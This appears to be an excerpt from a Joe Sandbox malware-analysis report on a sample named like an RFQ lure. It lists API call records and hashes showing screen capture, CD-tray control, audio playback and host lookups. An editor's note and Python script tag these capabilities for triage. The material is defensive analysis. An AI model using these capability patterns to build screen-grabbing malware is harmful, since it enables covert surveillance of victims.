• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A

APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 3631882475-2268648507
• Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
• Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9

APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
• String ID:
• API String ID: 4116747274-0
• Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
• Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54

APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00461678
• _wcslen.LIBCMT ref: 00461683
• __swprintf.LIBCMT ref: 00461721
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
• GetClassNameW.USER32(?,?,00000400), ref: 00461811
• GetDlgCtrlID.USER32(?), ref: 00461869
• GetWindowRect.USER32(?,?), ref: 004618A4
• GetParent.USER32(?), ref: 004618C3
• ScreenToClient.USER32(00000000), ref: 004618CA
• GetClassNameW.USER32(?,?,00000100), ref: 00461941
• GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
• Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6

APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
• Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
• Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69

APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
• Opcode ID: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
• Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
• Opcode Fuzzy Hash: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
• Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4

APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1976180769-4113822522
• Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
• Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
• Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
• Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
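The function records in this execution graph are flat API lists, but several of them line up into recognisable capability patterns: GetDC(NULL) followed by CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt with raster op 00CC0020 (SRCCOPY) and GetDIBits at 0043143E is a whole-screen capture; the mciSendStringW calls at 0045DB32 together with the strings "set cd door open"/"closed" drive the CD tray; the CreateFileW, ReadFile, CreateStreamOnHGlobal, OleLoadPicture sequence at 004300C3 below loads an image file and hands it to a static control (message 00000172 is STM_SETIMAGE). The strings at 004608A9 ("Line %d (File "%s"):", "^ ERROR") are the AutoIt3 runtime's script-error dialog format, which suggests an AutoIt-compiled stub; that is an editor's observation from the strings, not a detection the report makes. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the format shown on this page, attaches each record's "String ID" values, and tags capabilities with rules that check call arguments (GetDC's NULL window handle, the SRCCOPY raster op) and strings rather than API names alone. The capability names and rules are the editor's own, and the embedded sample input is constructed from the three records named above, trimmed to their API bullets and String ID lines.

```python
"""Tag capabilities in Joe Sandbox execution-graph records (editor's added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One API bullet of a function record; the argument list and the
# "Part of subcall function" prefix are both optional in the report.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
SRCCOPY = "00CC0020"  # dwRop value in the StretchBlt call at 004314CC


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]      # raw tokens; "?" is an argument the sandbox could not resolve
    ref: str             # call-site address
    subcall: str | None  # set when the report lists the call under a subfunction


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)  # from the "String ID" line

    def apis(self) -> set[str]:
        return {c.api for c in self.calls}

    def address(self) -> str:
        """First direct call site, which is how this page labels a function."""
        direct = [c.ref for c in self.calls if c.subcall is None]
        return direct[0] if direct else self.calls[0].ref


def parse_records(text: str) -> list[FunctionRecord]:
    """Each "APIs" heading opens a record; bullets and the String ID line attach to it."""
    records: list[FunctionRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif (m := API_LINE.search(line)):
            args = m.group("args")
            current.calls.append(ApiCall(
                m.group("api"), m.group("module"),
                [a.strip() for a in args.split(",")] if args is not None else [],
                m.group("ref"), m.group("sub")))
        elif line.startswith("• String ID:"):
            # The report joins several strings with "$"; keep inner spaces, drop empties.
            current.strings = [s.strip() for s in line[12:].split("$") if s.strip()]
    return records


def _screen_dc(r: FunctionRecord) -> bool:
    """GetDC(NULL) is a DC for the whole screen, not for one window."""
    return any(c.api == "GetDC" and c.args[:1] == ["00000000"] for c in r.calls)


def _srccopy_blit(r: FunctionRecord) -> bool:
    return any(c.api in ("BitBlt", "StretchBlt") and c.args and c.args[-1].upper() == SRCCOPY
               for c in r.calls)


# Rules check arguments and strings where API names alone are ambiguous: ordinary
# drawing code also uses GDI, but GetDC(NULL) + SRCCOPY blit into a memory bitmap
# + GetDIBits read-back is a screenshot. Names are the editor's, not Joe Sandbox's.
CAPABILITIES = {
    "screen_capture": lambda r: ({"CreateCompatibleBitmap", "CreateCompatibleDC", "GetDIBits"}
                                 <= r.apis() and _screen_dc(r) and _srccopy_blit(r)),
    "cd_tray_control": lambda r: (bool({"mciSendStringW", "mciSendStringA"} & r.apis())
                                  and any("cd door" in s for s in r.strings)),
    "image_from_file": lambda r: ({"CreateFileW", "ReadFile", "CreateStreamOnHGlobal",
                                   "OleLoadPicture"} <= r.apis()),
    "error_dialog": lambda r: ("MessageBoxW" in r.apis()
                               and any("error" in s.lower() for s in r.strings)),
}


def tag_capabilities(r: FunctionRecord) -> list[str]:
    return sorted(name for name, rule in CAPABILITIES.items() if rule(r))


def scan(text: str) -> list[tuple[str, list[str]]]:
    """(function address, tags) for every record that has at least one call."""
    return [(r.address(), tag_capabilities(r)) for r in parse_records(text) if r.calls]


# Constructed input: three records copied from this page (0043143E, 0045DB32, 004300C3),
# each trimmed to its API bullets and String ID line.
SAMPLE = """\
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
• String ID: (
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
• String ID:
"""

if __name__ == "__main__":
    for address, tags in scan(SAMPLE):
        print(address, ", ".join(tags) or "-")
```

Run against a whole report body (the text of the execution-graph section pasted into a file) the same `scan()` gives one line per function, which is a quicker triage pass than reading each record; rules that key on arguments, as the screenshot rule does, are what keep plain GUI drawing code out of the results.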

APIs
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same seven dumps listed in the records above (0x400000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__fassign
• String ID:
• API String ID: 461458858-0
• Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
• Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3969911579-0
                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                        • String ID: 0
                                                        • API String ID: 956284711-4108050209
                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 1965227024-3771769585
                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove_wcslen
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 369157077-1007645807
                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                        APIs
                                                        • GetParent.USER32 ref: 00445BF8
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 3125838495-3381328864
                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                        APIs
                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CharNext
                                                        • String ID:
                                                        • API String ID: 1350042424-0
                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                        APIs
